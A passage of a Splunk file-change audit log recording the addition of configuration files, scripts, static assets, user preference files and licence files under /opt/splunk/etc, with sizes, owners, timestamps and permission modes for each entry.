action=add,path="/opt/splunk/etc/system/README/default.meta.example", isdir=0, size=220, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.030, user=n/a, action=add,path="/opt/splunk/etc/system/README/default-mode.conf.spec", isdir=0, size=2476, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.026, user=n/a, action=add,path="/opt/splunk/etc/system/README/default-mode.conf.examples", isdir=0, size=194, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.022, user=n/a, action=add,path="/opt/splunk/etc/system/README/datatypesbnf.conf.spec", isdir=0, size=473, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.017, user=n/a, action=add,path="/opt/splunk/etc/system/README/datamodels.conf.spec", isdir=0, size=18693, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.013, user=n/a, action=add,path="/opt/splunk/etc/system/README/datamodels.conf.example", isdir=0, size=487, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.009, user=n/a, action=add,path="/opt/splunk/etc/system/README/conf_checker.rules", isdir=0, size=3344, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.005, user=n/a, action=add,path="/opt/splunk/etc/system/README/commands.conf.spec", isdir=0, size=13106, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:08.001, user=n/a, action=add,path="/opt/splunk/etc/system/README/commands.conf.example", isdir=0, size=1319, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.997, user=n/a, action=add,path="/opt/splunk/etc/system/README/collections.conf.spec", isdir=0, size=3950, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.993, user=n/a, action=add,path="/opt/splunk/etc/system/README/collections.conf.example", isdir=0, size=706, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.989, user=n/a, action=add,path="/opt/splunk/etc/system/README/checklist.conf.spec", isdir=0, size=4892, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.986, user=n/a, action=add,path="/opt/splunk/etc/system/README/bookmarks.conf.spec", isdir=0, size=1020, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.983, user=n/a, action=add,path="/opt/splunk/etc/system/README/bookmarks.conf.example", isdir=0, size=651, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.979, user=n/a, action=add,path="/opt/splunk/etc/system/README/authorize.conf.spec", isdir=0, size=38548, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.976, user=n/a, action=add,path="/opt/splunk/etc/system/README/authorize.conf.example", isdir=0, size=1494, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.972, user=n/a, action=add,path="/opt/splunk/etc/system/README/authentication.conf.spec", isdir=0, size=61972, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.968, user=n/a, action=add,path="/opt/splunk/etc/system/README/authentication.conf.example", isdir=0, size=6996, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.964, user=n/a, action=add,path="/opt/splunk/etc/system/README/audit.conf.spec", isdir=0, size=1595, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.960, user=n/a, action=add,path="/opt/splunk/etc/system/README/audit.conf.example", isdir=0, size=502, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.957, user=n/a, action=add,path="/opt/splunk/etc/system/README/app.conf.spec", isdir=0, size=18323, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.953, user=n/a, action=add,path="/opt/splunk/etc/system/README/app.conf.example", isdir=0, size=1923, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.950, user=n/a, action=add,path="/opt/splunk/etc/system/README/alert_actions.conf.spec", isdir=0, size=22796, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:07.946, user=n/a, action=add,path="/opt/splunk/etc/system/README/alert_actions.conf.example", isdir=0, size=3543, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.739, user=n/a, action=add,path="/opt/splunk/etc/system/bin/surrounding_events.py", isdir=0, size=5575, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.735, user=n/a, action=add,path="/opt/splunk/etc/system/bin/secret_tool_keyring.py", isdir=0, size=3351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.731, user=n/a, action=add,path="/opt/splunk/etc/system/bin/sc_rest.py", isdir=0, size=10257, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.727, user=n/a, action=add,path="/opt/splunk/etc/system/bin/pdfgen_endpoint.py", isdir=0, size=42735, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.722, user=n/a, action=add,path="/opt/splunk/etc/system/bin/localapps.py", isdir=0, size=6715, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.718, user=n/a, action=add,path="/opt/splunk/etc/system/bin/gnome_keyring.py", isdir=0, size=11583, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.714, user=n/a, action=add,path="/opt/splunk/etc/system/bin/field_extractor.py", isdir=0, size=8797, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.709, user=n/a, action=add,path="/opt/splunk/etc/system/bin/external_lookup.py", isdir=0, size=2516, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.705, user=n/a, action=add,path="/opt/splunk/etc/system/bin/convert_auth_v1_v2.py", isdir=0, size=2961, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.701, user=n/a, action=add,path="/opt/splunk/etc/system/bin/apptemplates.py", isdir=0, size=910, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.697, user=n/a, action=add,path="/opt/splunk/etc/system/bin/appsmanager.py", isdir=0, size=21756, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.693, user=n/a, action=add,path="/opt/splunk/etc/system/bin/addtail.py", isdir=0, size=2315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.689, user=n/a, action=add,path="/opt/splunk/etc/system/bin/addeventtype.py", isdir=0, size=3742, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.585, user=n/a, action=add,path="/opt/splunk/etc/system/static/splunkrc_cmds.xml", isdir=0, size=266389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.581, user=n/a, action=add,path="/opt/splunk/etc/system/static/moreAppsIcon.png", isdir=0, size=15210, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.577, user=n/a, action=add,path="/opt/splunk/etc/system/static/cliMaster.xml", isdir=0, size=822, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.574, user=n/a, action=add,path="/opt/splunk/etc/system/static/cliDirectory.xml", isdir=0, size=70, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.571, user=n/a, action=add,path="/opt/splunk/etc/system/static/bootstrapsearches.txt", isdir=0, size=52748, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.568, user=n/a, action=add,path="/opt/splunk/etc/system/static/atom.xsl", isdir=0, size=8386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.565, user=n/a, action=add,path="/opt/splunk/etc/system/static/appLogo_2x.png", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.561, user=n/a, action=add,path="/opt/splunk/etc/system/static/appLogo.png", isdir=0, size=126, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.558, user=n/a, action=add,path="/opt/splunk/etc/system/static/appIcon_2x.png", isdir=0, size=2989, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.555, user=n/a, action=add,path="/opt/splunk/etc/system/static/appIconAlt_2x.png", isdir=0, size=70, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.552, user=n/a, action=add,path="/opt/splunk/etc/system/static/appIconAlt.png", isdir=0, size=70, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.549, user=n/a, action=add,path="/opt/splunk/etc/system/static/appIcon.png", isdir=0, size=1302, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.545, user=n/a, action=add,path="/opt/splunk/etc/system/static/addtail_done.html", isdir=0, size=2577, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.539, user=n/a, action=add,path="/opt/splunk/etc/system/static/addeventtype_done.html", isdir=0, size=2573, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.535, user=n/a, action=add,path="/opt/splunk/etc/system/static/addeventtype.html", isdir=0, size=3762, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.328, user=n/a, action=add,path="/opt/splunk/etc/system/lookups/README", isdir=0, size=44, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.324, user=n/a, action=add,path="/opt/splunk/etc/system/local/web.conf", isdir=0, size=35, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-rw----", hash=] Audit:[timestamp=10-06-2022 17:43:06.320, user=n/a, action=add,path="/opt/splunk/etc/system/local/server.conf", isdir=0, size=741, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.316, user=n/a, action=add,path="/opt/splunk/etc/system/local/migration.conf", isdir=0, size=60, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.311, user=n/a, action=add,path="/opt/splunk/etc/system/local/inputs.conf", isdir=0, size=33, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:02 2022", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.306, user=n/a, action=add,path="/opt/splunk/etc/system/local/README", isdir=0, size=265, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.299, user=n/a, action=add,path="/opt/splunk/etc/system/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.295, user=n/a, action=add,path="/opt/splunk/etc/system/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.291, user=n/a, action=add,path="/opt/splunk/etc/system/lookups", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.288, user=n/a, action=add,path="/opt/splunk/etc/system/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.284, user=n/a, action=add,path="/opt/splunk/etc/system/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.280, user=n/a, action=add,path="/opt/splunk/etc/system/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.276, user=n/a, action=add,path="/opt/splunk/etc/system/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.171, user=n/a, action=add,path="/opt/splunk/etc/master-apps/_cluster/default/indexes.conf", isdir=0, size=1566, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.167, user=n/a, action=add,path="/opt/splunk/etc/master-apps/_cluster/local/README", isdir=0, size=233, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.162, user=n/a, action=add,path="/opt/splunk/etc/master-apps/_cluster/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.158, user=n/a, action=add,path="/opt/splunk/etc/master-apps/_cluster/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.153, user=n/a, action=add,path="/opt/splunk/etc/master-apps/_cluster", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:06.149, user=n/a, action=add,path="/opt/splunk/etc/disabled-apps/README", isdir=0, size=236, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:06.143, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/history/so1.csv", isdir=0, size=924, gid=41812, uid=41812, modtime="Thu Oct 6 17:42:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.137, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/history/.dummy_history", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:52 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.133, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/metadata/local.meta", isdir=0, size=208, gid=41812, uid=41812, modtime="Thu Oct 6 17:41:02 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.028, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/local/ui-tour.conf", isdir=0, size=25, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:53 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.024, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/local/ui-prefs.conf", isdir=0, size=44, gid=41812, uid=41812, modtime="Thu Oct 6 17:41:02 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.018, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:41:02 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:06.013, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:41:02 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:06.008, user=n/a, action=add,path="/opt/splunk/etc/users/user/search/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:42:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:06.005, user=n/a, action=add,path="/opt/splunk/etc/users/user/user-prefs/metadata/local.meta", isdir=0, size=68, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:06.001, user=n/a, action=add,path="/opt/splunk/etc/users/user/user-prefs/local/user-prefs.conf", isdir=0, size=38, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.996, user=n/a, action=add,path="/opt/splunk/etc/users/user/user-prefs/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:09 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.992, user=n/a, action=add,path="/opt/splunk/etc/users/user/user-prefs/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:09 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.988, user=n/a, action=add,path="/opt/splunk/etc/users/user/user-prefs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:37:54 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.984, user=n/a, action=add,path="/opt/splunk/etc/users/user/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:53 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.879, user=n/a, action=add,path="/opt/splunk/etc/users/admin/user-prefs/metadata/local.meta", isdir=0, size=68, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:59 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.875, user=n/a, action=add,path="/opt/splunk/etc/users/admin/user-prefs/local/user-prefs.conf", isdir=0, size=227, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:59 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.872, user=n/a, action=add,path="/opt/splunk/etc/users/admin/user-prefs/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:59 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.868, user=n/a, action=add,path="/opt/splunk/etc/users/admin/user-prefs/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:59 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.864, user=n/a, action=add,path="/opt/splunk/etc/users/admin/user-prefs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.861, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/search/history/.dummy_history", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.857, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/search/metadata/local.meta", isdir=0, size=72, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.852, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.848, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/search/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.844, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/splunk_monitoring_console/history/.dummy_history", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.841, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/splunk_monitoring_console/metadata/local.meta", isdir=0, size=72, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.736, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/splunk_monitoring_console/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.733, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/splunk_monitoring_console/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.729, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/splunk_monitoring_console", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.726, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.720, user=n/a, action=add,path="/opt/splunk/etc/users/users.ini.default", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:25:26 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.717, user=n/a, action=add,path="/opt/splunk/etc/users/users.ini", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.712, user=n/a, action=add,path="/opt/splunk/etc/users/user", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:40:52 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.708, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:36 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.702, user=n/a, action=add,path="/opt/splunk/etc/users/admin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.699, user=n/a, action=add,path="/opt/splunk/etc/licenses/download-trial/enttrial.lic", isdir=0, size=1725, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.695, user=n/a, action=add,path="/opt/splunk/etc/licenses/enterprise/splunk.lic", isdir=0, size=1421, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.590, user=n/a, action=add,path="/opt/splunk/etc/licenses/enterprise", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:18 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.586, user=n/a, action=add,path="/opt/splunk/etc/licenses/download-trial", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:43:05.582, user=n/a, action=add,path="/opt/splunk/etc/modules/internal/scheduler/config.xml", isdir=0, size=272, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.578, user=n/a, action=add,path="/opt/splunk/etc/modules/internal/scheduler", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.574, user=n/a, action=add,path="/opt/splunk/etc/modules/input/fschangemanager/config.xml", isdir=0, size=579, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.570, user=n/a, action=add,path="/opt/splunk/etc/modules/input/RemoteQueue/config.xml", isdir=0, size=731, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.566, user=n/a, action=add,path="/opt/splunk/etc/modules/input/structuredparsing/config.xml", isdir=0, size=1460, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.562, user=n/a, action=add,path="/opt/splunk/etc/modules/input/tailfile/config.xml", isdir=0, size=787, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.558, user=n/a, action=add,path="/opt/splunk/etc/modules/input/FIFO/config.xml", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.554, user=n/a, action=add,path="/opt/splunk/etc/modules/input/TCP/config.xml", isdir=0, size=729, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.548, user=n/a, action=add,path="/opt/splunk/etc/modules/input/UDP/config.xml", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.442, user=n/a, action=add,path="/opt/splunk/etc/modules/input/stashparsing/config.xml", isdir=0, size=1509, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.438, user=n/a, action=add,path="/opt/splunk/etc/modules/input/exec/config.xml", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.434, user=n/a, action=add,path="/opt/splunk/etc/modules/input/tailfile", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.430, user=n/a, action=add,path="/opt/splunk/etc/modules/input/structuredparsing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.426, user=n/a, action=add,path="/opt/splunk/etc/modules/input/stashparsing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.421, user=n/a, action=add,path="/opt/splunk/etc/modules/input/fschangemanager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.417, user=n/a, action=add,path="/opt/splunk/etc/modules/input/exec", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.413, user=n/a, action=add,path="/opt/splunk/etc/modules/input/UDP", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.410, user=n/a, action=add,path="/opt/splunk/etc/modules/input/TCP", isdir=1, size=4096, gid=41812, 